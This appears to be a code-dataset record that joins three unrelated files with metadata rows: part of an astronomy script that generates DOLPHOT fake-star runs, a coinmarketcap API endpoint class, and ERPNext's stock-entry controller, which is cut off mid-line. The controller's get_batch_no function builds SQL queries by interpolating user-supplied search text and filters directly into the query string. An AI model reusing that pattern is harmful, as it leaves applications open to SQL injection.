        f1 = open(fakeparam, 'a')
        f1.write("ACSuseCTE = 1\n")
        f1.write("WFC3useCTE = 1\n")
        f1.write("RandomFake = 1\n")
        f1.write("FakeMatch=3.0\n")
        f1.write("FakePad=0\n")
        f1.write("FakeStarPSF = 1.5\n")
        f1.write("FakeOut="+base+"_fake_"+np.str(i)+".fake\n")
        f1.write("FakeStars=fake.list_"+np.str(i)+"\n")
        f1.close()


def makerunfake(param_file, base, nruns, nstart=1):
    for i in range(nstart, nstart+nruns):
        fakeparam = "phot.fake_"+np.str(i)+".param"
        outfile = "runfake"+np.str(i)
        f = open(outfile, 'w')
        f.write("cd " + os.getcwd()+"\n")
        f.write("dolphot " + base + " -p" + fakeparam + " >> fake.log_"+np.str(i))
        f.close()
        subprocess.call("chmod +x " + outfile, shell=True)

'''
cd /clusterfs/dweisz/photometry/leop/
dolphot leop_acs.phot_1 -pleop.fake.param_1 >> fake1.log
'''

#if __name__ == '__main__':

base = sys.argv[1]  # e.g., test.phot
#rundir = sys.argv[2]
#nimages = np.int(sys.argv[3])
#name = sys.argv[3]
param_file = sys.argv[2]  # name of photometry parameter file
nruns = np.int(sys.argv[3])
filters = sys.argv[4]
f1min = np.float(sys.argv[5])
f1max = np.float(sys.argv[6])
c1min = np.float(sys.argv[7])
c1max = np.float(sys.argv[8])

#nimages = 12
#nruns = 72

#makephotfiles(base, 1, nruns , nimages)
makefakeparam(param_file, base, nruns)
makerunfake(param_file, base, nruns)
makefakelist(base, filters.split()[0], filters.split()[1], f1min, f1max, c1min, c1max, nruns)

#main()
mit
4,988,895,559,438,587,000
31.25
256
0.624874
false
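Since the script reads its eight positional arguments straight from sys.argv, a run looks like the sketch below. The file names and the magnitude/colour limits are invented for illustration; only the argument order is taken from the parsing above:

# python make_fakerun.py leop_acs.phot phot.param 10 "F475W F814W" 24 30 -1 3
#
# This would write fake.list_1..fake.list_10, append the Fake* keys to
# phot.fake_1..10.param, and emit executable runfake1..runfake10 scripts
# that each invoke dolphot with one fake-star parameter file.
import subprocess

cmd = 'python make_fakerun.py leop_acs.phot phot.param 10 "F475W F814W" 24 30 -1 3'
# subprocess.call(cmd, shell=True)  # uncomment to actually launch
print(cmd)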
collab-project/luma.cryptocurrency
luma/cryptocurrency/endpoint/coinmarketcap.py
1
1134
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Thijs Triemstra and contributors
# See LICENSE.rst for details.

"""
Endpoint for coinmarketcap.com

:see: https://coinmarketcap.com/api/
"""

from datetime import datetime

from dateutil.tz.tz import tzutc

from . import Endpoint, EndpointResponse


class CoinmarketcapResponse(EndpointResponse):

    @property
    def data(self):
        return self.json_data[0]

    def parse_price(self):
        return float(self.data.get('price_{}'.format(
            self.currency_code.lower())))

    def parse_price_in_btc(self):
        return float(self.data.get('price_btc'))

    def parse_timestamp(self):
        return datetime.fromtimestamp(
            int(self.data.get('last_updated')), tz=tzutc())


class Coinmarketcap(Endpoint):

    responseType = CoinmarketcapResponse

    def get_url(self):
        base = 'https://api.coinmarketcap.com/{api_version}/ticker/{coin}/'
        if self.currency_code != 'USD':
            base += '?convert={}'.format(self.currency_code)

        return base.format(
            api_version=self.api_version,
            coin=self.coin
        )
mit
1,155,416,785,745,923,300
22.625
75
0.640212
false
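The only branching in get_url() is the convert parameter for non-USD quote currencies. A standalone sketch of that construction; build_url is a hypothetical helper mirroring the method, since the Endpoint base class is not shown in this record:

def build_url(api_version, coin, currency_code):
    # Mirrors Coinmarketcap.get_url(): '?convert=' is appended only when
    # the quote currency is not USD.
    base = 'https://api.coinmarketcap.com/{api_version}/ticker/{coin}/'
    if currency_code != 'USD':
        base += '?convert={}'.format(currency_code)
    return base.format(api_version=api_version, coin=coin)


print(build_url('v1', 'bitcoin', 'USD'))  # .../v1/ticker/bitcoin/
print(build_url('v1', 'bitcoin', 'EUR'))  # .../v1/ticker/bitcoin/?convert=EUR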
rohitwaghchaure/New_Theme_Erp
erpnext/stock/doctype/stock_entry/stock_entry.py
1
34617
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe import frappe.defaults from frappe.utils import cstr, cint, flt, comma_or, nowdate from frappe import _ from erpnext.stock.utils import get_incoming_rate from erpnext.stock.stock_ledger import get_previous_sle from erpnext.controllers.queries import get_match_cond from erpnext.stock.get_item_details import get_available_qty class NotUpdateStockError(frappe.ValidationError): pass class StockOverReturnError(frappe.ValidationError): pass class IncorrectValuationRateError(frappe.ValidationError): pass class DuplicateEntryForProductionOrderError(frappe.ValidationError): pass from erpnext.controllers.stock_controller import StockController form_grid_templates = { "mtn_details": "templates/form_grid/stock_entry_grid.html" } class StockEntry(StockController): fname = 'mtn_details' def onload(self): if self.docstatus==1: for item in self.get(self.fname): item.update(get_available_qty(item.item_code, item.s_warehouse)) def validate(self): self.validate_posting_time() self.validate_purpose() pro_obj = self.production_order and \ frappe.get_doc('Production Order', self.production_order) or None self.set_transfer_qty() self.validate_item() self.validate_uom_is_integer("uom", "qty") self.validate_uom_is_integer("stock_uom", "transfer_qty") self.validate_warehouse(pro_obj) self.validate_production_order(pro_obj) self.get_stock_and_rate() self.validate_incoming_rate() self.validate_bom() self.validate_finished_goods() self.validate_return_reference_doc() self.validate_with_material_request() self.validate_fiscal_year() self.validate_valuation_rate() self.set_total_amount() def on_submit(self): from erpnext.stock.stock_custom_methods import validate_for_si_submitted validate_for_si_submitted(self) self.update_stock_ledger() from erpnext.stock.doctype.serial_no.serial_no import update_serial_nos_after_submit update_serial_nos_after_submit(self, "mtn_details") self.update_production_order() self.make_gl_entries() def on_cancel(self): self.update_stock_ledger() self.update_production_order() self.make_gl_entries_on_cancel() def validate_fiscal_year(self): from erpnext.accounts.utils import validate_fiscal_year validate_fiscal_year(self.posting_date, self.fiscal_year, self.meta.get_label("posting_date")) def validate_purpose(self): valid_purposes = ["Material Issue", "Material Receipt", "Material Transfer", "Manufacture/Repack", "Subcontract", "Sales Return", "Purchase Return"] if self.purpose not in valid_purposes: frappe.throw(_("Purpose must be one of {0}").format(comma_or(valid_purposes))) def set_transfer_qty(self): for item in self.get("mtn_details"): if not flt(item.qty): frappe.throw(_("Row {0}: Qty is mandatory").format(item.idx)) item.transfer_qty = flt(item.qty * item.conversion_factor, self.precision("transfer_qty", item)) def validate_item(self): stock_items = self.get_stock_items() serialized_items = self.get_serialized_items() for item in self.get("mtn_details"): if item.item_code not in stock_items: frappe.throw(_("{0} is not a stock Item").format(item.item_code)) if not item.stock_uom: item.stock_uom = frappe.db.get_value("Item", item.item_code, "stock_uom") if not item.uom: item.uom = item.stock_uom if not item.conversion_factor: item.conversion_factor = 1 if not item.transfer_qty: item.transfer_qty = item.qty * item.conversion_factor if (self.purpose in ("Material Transfer", "Sales Return", "Purchase Return") 
and not item.serial_no and item.item_code in serialized_items): frappe.throw(_("Row #{0}: Please specify Serial No for Item {1}").format(item.idx, item.item_code), frappe.MandatoryError) def validate_warehouse(self, pro_obj): """perform various (sometimes conditional) validations on warehouse""" source_mandatory = ["Material Issue", "Material Transfer", "Purchase Return"] target_mandatory = ["Material Receipt", "Material Transfer", "Sales Return"] validate_for_manufacture_repack = any([d.bom_no for d in self.get("mtn_details")]) if self.purpose in source_mandatory and self.purpose not in target_mandatory: self.to_warehouse = None for d in self.get('mtn_details'): d.t_warehouse = None elif self.purpose in target_mandatory and self.purpose not in source_mandatory: self.from_warehouse = None for d in self.get('mtn_details'): d.s_warehouse = None for d in self.get('mtn_details'): if not d.s_warehouse and not d.t_warehouse: d.s_warehouse = self.from_warehouse d.t_warehouse = self.to_warehouse if not (d.s_warehouse or d.t_warehouse): frappe.throw(_("Atleast one warehouse is mandatory")) if self.purpose in source_mandatory and not d.s_warehouse: frappe.throw(_("Source warehouse is mandatory for row {0}").format(d.idx)) if self.purpose in target_mandatory and not d.t_warehouse: frappe.throw(_("Target warehouse is mandatory for row {0}").format(d.idx)) if self.purpose == "Manufacture/Repack": if validate_for_manufacture_repack: if d.bom_no: d.s_warehouse = None if not d.t_warehouse: frappe.throw(_("Target warehouse is mandatory for row {0}").format(d.idx)) elif pro_obj and cstr(d.t_warehouse) != pro_obj.fg_warehouse: frappe.throw(_("Target warehouse in row {0} must be same as Production Order").format(d.idx)) else: d.t_warehouse = None if not d.s_warehouse: frappe.throw(_("Source warehouse is mandatory for row {0}").format(d.idx)) if cstr(d.s_warehouse) == cstr(d.t_warehouse): frappe.throw(_("Source and target warehouse cannot be same for row {0}").format(d.idx)) def validate_production_order(self, pro_obj=None): if not pro_obj: if self.production_order: pro_obj = frappe.get_doc('Production Order', self.production_order) else: return if self.purpose == "Manufacture/Repack": # check for double entry self.check_duplicate_entry_for_production_order() elif self.purpose != "Material Transfer": self.production_order = None def check_duplicate_entry_for_production_order(self): other_ste = [t[0] for t in frappe.db.get_values("Stock Entry", { "production_order": self.production_order, "purpose": self.purpose, "docstatus": ["!=", 2], "name": ["!=", self.name] }, "name")] if other_ste: production_item, qty = frappe.db.get_value("Production Order", self.production_order, ["production_item", "qty"]) args = other_ste + [production_item] fg_qty_already_entered = frappe.db.sql("""select sum(transfer_qty) from `tabStock Entry Detail` where parent in (%s) and item_code = %s and ifnull(s_warehouse,'')='' """ % (", ".join(["%s" * len(other_ste)]), "%s"), args)[0][0] if fg_qty_already_entered >= qty: frappe.throw(_("Stock Entries already created for Production Order ") + self.production_order + ":" + ", ".join(other_ste), DuplicateEntryForProductionOrderError) def validate_valuation_rate(self): if self.purpose == "Manufacture/Repack": valuation_at_source, valuation_at_target = 0, 0 for d in self.get("mtn_details"): if d.s_warehouse and not d.t_warehouse: valuation_at_source += flt(d.amount) if d.t_warehouse and not d.s_warehouse: valuation_at_target += flt(d.amount) if valuation_at_target < valuation_at_source: 
frappe.throw(_("Total valuation for manufactured or repacked item(s) can not be less than total valuation of raw materials")) def set_total_amount(self): self.total_amount = sum([flt(item.amount) for item in self.get("mtn_details")]) def get_stock_and_rate(self, force=False): """get stock and incoming rate on posting date""" raw_material_cost = 0.0 if not self.posting_date or not self.posting_time: frappe.throw(_("Posting date and posting time is mandatory")) allow_negative_stock = cint(frappe.db.get_default("allow_negative_stock")) for d in self.get('mtn_details'): args = frappe._dict({ "item_code": d.item_code, "warehouse": d.s_warehouse or d.t_warehouse, "posting_date": self.posting_date, "posting_time": self.posting_time, "qty": d.s_warehouse and -1*d.transfer_qty or d.transfer_qty, "serial_no": d.serial_no }) # get actual stock at source warehouse d.actual_qty = get_previous_sle(args).get("qty_after_transaction") or 0 # validate qty during submit if d.docstatus==1 and d.s_warehouse and not allow_negative_stock and d.actual_qty < d.transfer_qty: frappe.throw(_("""Row {0}: Qty not avalable in warehouse {1} on {2} {3}. Available Qty: {4}, Transfer Qty: {5}""").format(d.idx, d.s_warehouse, self.posting_date, self.posting_time, d.actual_qty, d.transfer_qty)) # get incoming rate if not d.bom_no: if not flt(d.incoming_rate) or d.s_warehouse or self.purpose == "Sales Return" or force: incoming_rate = flt(self.get_incoming_rate(args), self.precision("incoming_rate", d)) if incoming_rate > 0: d.incoming_rate = incoming_rate d.amount = flt(d.transfer_qty) * flt(d.incoming_rate) if not d.t_warehouse: raw_material_cost += flt(d.amount) # set incoming rate for fg item if self.purpose == "Manufacture/Repack": number_of_fg_items = len([t.t_warehouse for t in self.get("mtn_details") if t.t_warehouse]) for d in self.get("mtn_details"): if d.bom_no or (d.t_warehouse and number_of_fg_items == 1): if not flt(d.incoming_rate) or force: operation_cost_per_unit = 0 if d.bom_no: bom = frappe.db.get_value("BOM", d.bom_no, ["operating_cost", "quantity"], as_dict=1) operation_cost_per_unit = flt(bom.operating_cost) / flt(bom.quantity) d.incoming_rate = operation_cost_per_unit + (raw_material_cost / flt(d.transfer_qty)) d.amount = flt(d.transfer_qty) * flt(d.incoming_rate) break def get_incoming_rate(self, args): incoming_rate = 0 if self.purpose == "Sales Return": incoming_rate = self.get_incoming_rate_for_sales_return(args) else: incoming_rate = get_incoming_rate(args) return incoming_rate def get_incoming_rate_for_sales_return(self, args): incoming_rate = 0.0 if (self.delivery_note_no or self.sales_invoice_no) and args.get("item_code"): incoming_rate = frappe.db.sql("""select abs(ifnull(stock_value_difference, 0) / actual_qty) from `tabStock Ledger Entry` where voucher_type = %s and voucher_no = %s and item_code = %s limit 1""", ((self.delivery_note_no and "Delivery Note" or "Sales Invoice"), self.delivery_note_no or self.sales_invoice_no, args.item_code)) incoming_rate = incoming_rate[0][0] if incoming_rate else 0.0 return incoming_rate def validate_incoming_rate(self): for d in self.get('mtn_details'): if d.t_warehouse: self.validate_value("incoming_rate", ">", 0, d, raise_exception=IncorrectValuationRateError) def validate_bom(self): for d in self.get('mtn_details'): if d.bom_no and not frappe.db.sql("""select name from `tabBOM` where item = %s and name = %s and docstatus = 1 and is_active = 1""", (d.item_code, d.bom_no)): frappe.throw(_("BOM {0} is not submitted or inactive BOM for Item 
{1}").format(d.bom_no, d.item_code)) def validate_finished_goods(self): """validation: finished good quantity should be same as manufacturing quantity""" for d in self.get('mtn_details'): if d.bom_no and flt(d.transfer_qty) != flt(self.fg_completed_qty): frappe.throw(_("Quantity in row {0} ({1}) must be same as manufactured quantity {2}").format(d.idx, d.transfer_qty, self.fg_completed_qty)) def validate_return_reference_doc(self): """validate item with reference doc""" ref = get_return_doc_and_details(self) if ref.doc: # validate docstatus if ref.doc.docstatus != 1: frappe.throw(_("{0} {1} must be submitted").format(ref.doc.doctype, ref.doc.name), frappe.InvalidStatusError) # update stock check if ref.doc.doctype == "Sales Invoice" and cint(ref.doc.update_stock) != 1: frappe.throw(_("'Update Stock' for Sales Invoice {0} must be set").format(ref.doc.name), NotUpdateStockError) # posting date check ref_posting_datetime = "%s %s" % (cstr(ref.doc.posting_date), cstr(ref.doc.posting_time) or "00:00:00") this_posting_datetime = "%s %s" % (cstr(self.posting_date), cstr(self.posting_time)) if this_posting_datetime < ref_posting_datetime: from frappe.utils.dateutils import datetime_in_user_format frappe.throw(_("Posting timestamp must be after {0}").format(datetime_in_user_format(ref_posting_datetime))) stock_items = get_stock_items_for_return(ref.doc, ref.parentfields) already_returned_item_qty = self.get_already_returned_item_qty(ref.fieldname) for item in self.get("mtn_details"): # validate if item exists in the ref doc and that it is a stock item if item.item_code not in stock_items: frappe.throw(_("Item {0} does not exist in {1} {2}").format(item.item_code, ref.doc.doctype, ref.doc.name), frappe.DoesNotExistError) # validate quantity <= ref item's qty - qty already returned if self.purpose == "Purchase Return": ref_item_qty = sum([flt(d.qty)*flt(d.conversion_factor) for d in ref.doc.get({"item_code": item.item_code})]) elif self.purpose == "Sales Return": ref_item_qty = sum([flt(d.qty) for d in ref.doc.get({"item_code": item.item_code})]) returnable_qty = ref_item_qty - flt(already_returned_item_qty.get(item.item_code)) if not returnable_qty: frappe.throw(_("Item {0} has already been returned").format(item.item_code), StockOverReturnError) elif item.transfer_qty > returnable_qty: frappe.throw(_("Cannot return more than {0} for Item {1}").format(returnable_qty, item.item_code), StockOverReturnError) def get_already_returned_item_qty(self, ref_fieldname): return dict(frappe.db.sql("""select item_code, sum(transfer_qty) as qty from `tabStock Entry Detail` where parent in ( select name from `tabStock Entry` where `%s`=%s and docstatus=1) group by item_code""" % (ref_fieldname, "%s"), (self.get(ref_fieldname),))) def update_stock_ledger(self): sl_entries = [] for d in self.get('mtn_details'): if cstr(d.s_warehouse) and self.docstatus == 1: sl_entries.append(self.get_sl_entries(d, { "warehouse": cstr(d.s_warehouse), "actual_qty": -flt(d.transfer_qty), "incoming_rate": 0 })) if cstr(d.t_warehouse): sl_entries.append(self.get_sl_entries(d, { "warehouse": cstr(d.t_warehouse), "actual_qty": flt(d.transfer_qty), "incoming_rate": flt(d.incoming_rate) })) # On cancellation, make stock ledger entry for # target warehouse first, to update serial no values properly if cstr(d.s_warehouse) and self.docstatus == 2: sl_entries.append(self.get_sl_entries(d, { "warehouse": cstr(d.s_warehouse), "actual_qty": -flt(d.transfer_qty), "incoming_rate": 0 })) self.make_sl_entries(sl_entries, self.amended_from and 'Yes' or 
'No') def update_production_order(self): def _validate_production_order(pro_doc): if flt(pro_doc.docstatus) != 1: frappe.throw(_("Production Order {0} must be submitted").format(self.production_order)) if pro_doc.status == 'Stopped': frappe.throw(_("Transaction not allowed against stopped Production Order {0}").format(self.production_order)) if self.production_order: pro_doc = frappe.get_doc("Production Order", self.production_order) _validate_production_order(pro_doc) pro_doc.run_method("update_status") if self.purpose == "Manufacture/Repack": pro_doc.run_method("update_produced_qty") self.update_planned_qty(pro_doc) def update_planned_qty(self, pro_doc): from erpnext.stock.utils import update_bin update_bin({ "item_code": pro_doc.production_item, "warehouse": pro_doc.fg_warehouse, "posting_date": self.posting_date, "planned_qty": (self.docstatus==1 and -1 or 1 ) * flt(self.fg_completed_qty) }) def get_item_details(self, args): item = frappe.db.sql("""select stock_uom, description, item_name, expense_account, buying_cost_center from `tabItem` where name = %s and (ifnull(end_of_life,'0000-00-00')='0000-00-00' or end_of_life > now())""", (args.get('item_code')), as_dict = 1) if not item: frappe.throw(_("Item {0} is not active or end of life has been reached").format(args.get("item_code"))) ret = { 'uom' : item and item[0]['stock_uom'] or '', 'stock_uom' : item and item[0]['stock_uom'] or '', 'description' : item and item[0]['description'] or '', 'item_name' : item and item[0]['item_name'] or '', 'expense_account' : args.get("expense_account") \ or frappe.db.get_value("Company", args.get("company"), "stock_adjustment_account"), 'cost_center' : item and item[0]['buying_cost_center'] or args.get("cost_center"), 'qty' : 0, 'transfer_qty' : 0, 'conversion_factor' : 1, 'batch_no' : '', 'actual_qty' : 0, 'incoming_rate' : 0 } stock_and_rate = args.get('warehouse') and self.get_warehouse_details(args) or {} ret.update(stock_and_rate) return ret def get_uom_details(self, args): conversion_factor = frappe.db.get_value("UOM Conversion Detail", {"parent": args.get("item_code"), "uom": args.get("uom")}, "conversion_factor") if not conversion_factor: frappe.msgprint(_("UOM coversion factor required for UOM: {0} in Item: {1}") .format(args.get("uom"), args.get("item_code"))) ret = {'uom' : ''} else: ret = { 'conversion_factor' : flt(conversion_factor), 'transfer_qty' : flt(args.get("qty")) * flt(conversion_factor) } return ret def get_warehouse_details(self, args): ret = {} if args.get('warehouse') and args.get('item_code'): args.update({ "posting_date": self.posting_date, "posting_time": self.posting_time, }) args = frappe._dict(args) ret = { "actual_qty" : get_previous_sle(args).get("qty_after_transaction") or 0, "incoming_rate" : self.get_incoming_rate(args) } return ret def get_items(self): self.set('mtn_details', []) pro_obj = None if self.production_order: # common validations pro_obj = frappe.get_doc('Production Order', self.production_order) if pro_obj: self.validate_production_order(pro_obj) self.bom_no = pro_obj.bom_no else: # invalid production order self.production_order = None if self.bom_no: if self.purpose in ["Material Issue", "Material Transfer", "Manufacture/Repack", "Subcontract"]: if self.production_order and self.purpose == "Material Transfer": item_dict = self.get_pending_raw_materials(pro_obj) else: if not self.fg_completed_qty: frappe.throw(_("Manufacturing Quantity is mandatory")) item_dict = self.get_bom_raw_materials(self.fg_completed_qty) for item in item_dict.values(): if 
pro_obj: item["from_warehouse"] = pro_obj.wip_warehouse item["to_warehouse"] = "" # add raw materials to Stock Entry Detail table self.add_to_stock_entry_detail(item_dict) # add finished good item to Stock Entry Detail table -- along with bom_no if self.production_order and self.purpose == "Manufacture/Repack": item = frappe.db.get_value("Item", pro_obj.production_item, ["item_name", "description", "stock_uom", "expense_account", "buying_cost_center"], as_dict=1) self.add_to_stock_entry_detail({ cstr(pro_obj.production_item): { "to_warehouse": pro_obj.fg_warehouse, "from_warehouse": "", "qty": self.fg_completed_qty, "item_name": item.item_name, "description": item.description, "stock_uom": item.stock_uom, "expense_account": item.expense_account, "cost_center": item.buying_cost_center, } }, bom_no=pro_obj.bom_no) elif self.purpose in ["Material Receipt", "Manufacture/Repack"]: if self.purpose=="Material Receipt": self.from_warehouse = "" item = frappe.db.sql("""select name, item_name, description, stock_uom, expense_account, buying_cost_center from `tabItem` where name=(select item from tabBOM where name=%s)""", self.bom_no, as_dict=1) self.add_to_stock_entry_detail({ item[0]["name"] : { "qty": self.fg_completed_qty, "item_name": item[0].item_name, "description": item[0]["description"], "stock_uom": item[0]["stock_uom"], "from_warehouse": "", "expense_account": item[0].expense_account, "cost_center": item[0].buying_cost_center, } }, bom_no=self.bom_no) self.get_stock_and_rate() def get_bom_raw_materials(self, qty): from erpnext.manufacturing.doctype.bom.bom import get_bom_items_as_dict # item dict = { item_code: {qty, description, stock_uom} } item_dict = get_bom_items_as_dict(self.bom_no, qty=qty, fetch_exploded = self.use_multi_level_bom) for item in item_dict.values(): item.from_warehouse = item.default_warehouse return item_dict def get_pending_raw_materials(self, pro_obj): """ issue (item quantity) that is pending to issue or desire to transfer, whichever is less """ item_dict = self.get_bom_raw_materials(1) issued_item_qty = self.get_issued_qty() max_qty = flt(pro_obj.qty) only_pending_fetched = [] for item in item_dict: pending_to_issue = (max_qty * item_dict[item]["qty"]) - issued_item_qty.get(item, 0) desire_to_transfer = flt(self.fg_completed_qty) * item_dict[item]["qty"] if desire_to_transfer <= pending_to_issue: item_dict[item]["qty"] = desire_to_transfer else: item_dict[item]["qty"] = pending_to_issue if pending_to_issue: only_pending_fetched.append(item) # delete items with 0 qty for item in item_dict.keys(): if not item_dict[item]["qty"]: del item_dict[item] # show some message if not len(item_dict): frappe.msgprint(_("""All items have already been transferred for this Production Order.""")) elif only_pending_fetched: frappe.msgprint(_("Pending Items {0} updated").format(only_pending_fetched)) return item_dict def get_issued_qty(self): issued_item_qty = {} result = frappe.db.sql("""select t1.item_code, sum(t1.qty) from `tabStock Entry Detail` t1, `tabStock Entry` t2 where t1.parent = t2.name and t2.production_order = %s and t2.docstatus = 1 and t2.purpose = 'Material Transfer' group by t1.item_code""", self.production_order) for t in result: issued_item_qty[t[0]] = flt(t[1]) return issued_item_qty def add_to_stock_entry_detail(self, item_dict, bom_no=None): expense_account, cost_center = frappe.db.get_values("Company", self.company, \ ["default_expense_account", "cost_center"])[0] for d in item_dict: se_child = self.append('mtn_details') se_child.s_warehouse = 
item_dict[d].get("from_warehouse", self.from_warehouse) se_child.t_warehouse = item_dict[d].get("to_warehouse", self.to_warehouse) se_child.item_code = cstr(d) se_child.item_name = item_dict[d]["item_name"] se_child.description = item_dict[d]["description"] se_child.uom = item_dict[d]["stock_uom"] se_child.stock_uom = item_dict[d]["stock_uom"] se_child.qty = flt(item_dict[d]["qty"]) se_child.expense_account = item_dict[d]["expense_account"] or expense_account se_child.cost_center = item_dict[d]["cost_center"] or cost_center # in stock uom se_child.transfer_qty = flt(item_dict[d]["qty"]) se_child.conversion_factor = 1.00 # to be assigned for finished item se_child.bom_no = bom_no def validate_with_material_request(self): for item in self.get("mtn_details"): if item.material_request: mreq_item = frappe.db.get_value("Material Request Item", {"name": item.material_request_item, "parent": item.material_request}, ["item_code", "warehouse", "idx"], as_dict=True) if mreq_item.item_code != item.item_code or mreq_item.warehouse != item.t_warehouse: frappe.throw(_("Item or Warehouse for row {0} does not match Material Request").format(item.idx), frappe.MappingMismatchError) def get_work_orderDetails(self, work_order): WO_details = frappe.db.get_value('Work Order', work_order, '*', as_dict=1, debug=1) if WO_details: return { 'sales_invoice_no' : WO_details.sales_invoice_no, 'customer_name' : WO_details.customer_name, 'trial_date' : WO_details.trial_date, 'delivery_date' : WO_details.delivery_date, 'trials' : WO_details.trial_no } else: return None @frappe.whitelist() def get_party_details(ref_dt, ref_dn): if ref_dt in ["Delivery Note", "Sales Invoice"]: res = frappe.db.get_value(ref_dt, ref_dn, ["customer", "customer_name", "address_display as customer_address"], as_dict=1) else: res = frappe.db.get_value(ref_dt, ref_dn, ["supplier", "supplier_name", "address_display as supplier_address"], as_dict=1) return res or {} @frappe.whitelist() def get_production_order_details(production_order): result = frappe.db.sql("""select bom_no, ifnull(qty, 0) - ifnull(produced_qty, 0) as fg_completed_qty, use_multi_level_bom, wip_warehouse from `tabProduction Order` where name = %s""", production_order, as_dict=1) return result and result[0] or {} def query_sales_return_doc(doctype, txt, searchfield, start, page_len, filters): conditions = "" if doctype == "Sales Invoice": conditions = "and update_stock=1" return frappe.db.sql("""select name, customer, customer_name from `tab%s` where docstatus = 1 and (`%s` like %%(txt)s or `customer` like %%(txt)s) %s %s order by name, customer, customer_name limit %s""" % (doctype, searchfield, conditions, get_match_cond(doctype), "%(start)s, %(page_len)s"), {"txt": "%%%s%%" % txt, "start": start, "page_len": page_len}, as_list=True) def query_purchase_return_doc(doctype, txt, searchfield, start, page_len, filters): return frappe.db.sql("""select name, supplier, supplier_name from `tab%s` where docstatus = 1 and (`%s` like %%(txt)s or `supplier` like %%(txt)s) %s order by name, supplier, supplier_name limit %s""" % (doctype, searchfield, get_match_cond(doctype), "%(start)s, %(page_len)s"), {"txt": "%%%s%%" % txt, "start": start, "page_len": page_len}, as_list=True) def query_return_item(doctype, txt, searchfield, start, page_len, filters): txt = txt.replace("%", "") ref = get_return_doc_and_details(filters) stock_items = get_stock_items_for_return(ref.doc, ref.parentfields) result = [] for item in ref.doc.get_all_children(): if getattr(item, "item_code", None) in stock_items: 
item.item_name = cstr(item.item_name) item.description = cstr(item.description) if (txt in item.item_code) or (txt in item.item_name) or (txt in item.description): val = [ item.item_code, (len(item.item_name) > 40) and (item.item_name[:40] + "...") or item.item_name, (len(item.description) > 40) and (item.description[:40] + "...") or \ item.description ] if val not in result: result.append(val) return result[start:start+page_len] def get_batch_no(doctype, txt, searchfield, start, page_len, filters): if not filters.get("posting_date"): filters["posting_date"] = nowdate() batch_nos = None args = { 'item_code': filters.get("item_code"), 's_warehouse': filters.get('s_warehouse'), 'posting_date': filters.get('posting_date'), 'txt': "%%%s%%" % txt, 'mcond':get_match_cond(doctype), "start": start, "page_len": page_len } if filters.get("s_warehouse"): batch_nos = frappe.db.sql("""select batch_no from `tabStock Ledger Entry` sle where item_code = '%(item_code)s' and warehouse = '%(s_warehouse)s' and batch_no like '%(txt)s' and exists(select * from `tabBatch` where name = sle.batch_no and (ifnull(expiry_date, '2099-12-31') >= %(posting_date)s or expiry_date = '') and docstatus != 2) %(mcond)s group by batch_no having sum(actual_qty) > 0 order by batch_no desc limit %(start)s, %(page_len)s """ % args) if batch_nos: return batch_nos else: return frappe.db.sql("""select name from `tabBatch` where item = '%(item_code)s' and docstatus < 2 and (ifnull(expiry_date, '2099-12-31') >= %(posting_date)s or expiry_date = '' or expiry_date = "0000-00-00") %(mcond)s order by name desc limit %(start)s, %(page_len)s """ % args) def get_stock_items_for_return(ref_doc, parentfields): """return item codes filtered from doc, which are stock items""" if isinstance(parentfields, basestring): parentfields = [parentfields] all_items = list(set([d.item_code for d in ref_doc.get_all_children() if d.get("item_code")])) stock_items = frappe.db.sql_list("""select name from `tabItem` where is_stock_item='Yes' and name in (%s)""" % (", ".join(["%s"] * len(all_items))), tuple(all_items)) return stock_items def get_return_doc_and_details(args): ref = frappe._dict() # get ref_doc if args.get("purpose") in return_map: for fieldname, val in return_map[args.get("purpose")].items(): if args.get(fieldname): ref.fieldname = fieldname ref.doc = frappe.get_doc(val[0], args.get(fieldname)) ref.parentfields = val[1] break return ref return_map = { "Sales Return": { # [Ref DocType, [Item tables' parentfields]] "delivery_note_no": ["Delivery Note", ["delivery_note_details", "packing_details"]], "sales_invoice_no": ["Sales Invoice", ["entries", "packing_details"]] }, "Purchase Return": { "purchase_receipt_no": ["Purchase Receipt", ["purchase_receipt_details"]] } } @frappe.whitelist() def make_return_jv(stock_entry): se = frappe.get_doc("Stock Entry", stock_entry) if not se.purpose in ["Sales Return", "Purchase Return"]: return ref = get_return_doc_and_details(se) if ref.doc.doctype == "Delivery Note": result = make_return_jv_from_delivery_note(se, ref) elif ref.doc.doctype == "Sales Invoice": result = make_return_jv_from_sales_invoice(se, ref) elif ref.doc.doctype == "Purchase Receipt": result = make_return_jv_from_purchase_receipt(se, ref) # create jv doc and fetch balance for each unique row item jv = frappe.new_doc("Journal Voucher") jv.update({ "posting_date": se.posting_date, "voucher_type": se.purpose == "Sales Return" and "Credit Note" or "Debit Note", "fiscal_year": se.fiscal_year, "company": se.company }) from erpnext.accounts.utils 
import get_balance_on for r in result: jv.append("entries", { "account": r.get("account"), "against_invoice": r.get("against_invoice"), "against_voucher": r.get("against_voucher"), "balance": get_balance_on(r.get("account"), se.posting_date) if r.get("account") else 0 }) return jv def make_return_jv_from_sales_invoice(se, ref): # customer account entry parent = { "account": ref.doc.debit_to, "against_invoice": ref.doc.name, } # income account entries children = [] for se_item in se.get("mtn_details"): # find item in ref.doc ref_item = ref.doc.get({"item_code": se_item.item_code})[0] account = get_sales_account_from_item(ref.doc, ref_item) if account not in children: children.append(account) return [parent] + [{"account": account} for account in children] def get_sales_account_from_item(doc, ref_item): account = None if not getattr(ref_item, "income_account", None): if ref_item.parent_item: parent_item = doc.get(doc.fname, {"item_code": ref_item.parent_item})[0] account = parent_item.income_account else: account = ref_item.income_account return account def make_return_jv_from_delivery_note(se, ref): invoices_against_delivery = get_invoice_list("Sales Invoice Item", "delivery_note", ref.doc.name) if not invoices_against_delivery: sales_orders_against_delivery = [d.against_sales_order for d in ref.doc.get_all_children() if getattr(d, "against_sales_order", None)] if sales_orders_against_delivery: invoices_against_delivery = get_invoice_list("Sales Invoice Item", "sales_order", sales_orders_against_delivery) if not invoices_against_delivery: return [] packing_item_parent_map = dict([[d.item_code, d.parent_item] for d in ref.doc.get(ref.parentfields[1])]) parent = {} children = [] for se_item in se.get("mtn_details"): for sales_invoice in invoices_against_delivery: si = frappe.get_doc("Sales Invoice", sales_invoice) if se_item.item_code in packing_item_parent_map: ref_item = si.get({"item_code": packing_item_parent_map[se_item.item_code]}) else: ref_item = si.get({"item_code": se_item.item_code}) if not ref_item: continue ref_item = ref_item[0] account = get_sales_account_from_item(si, 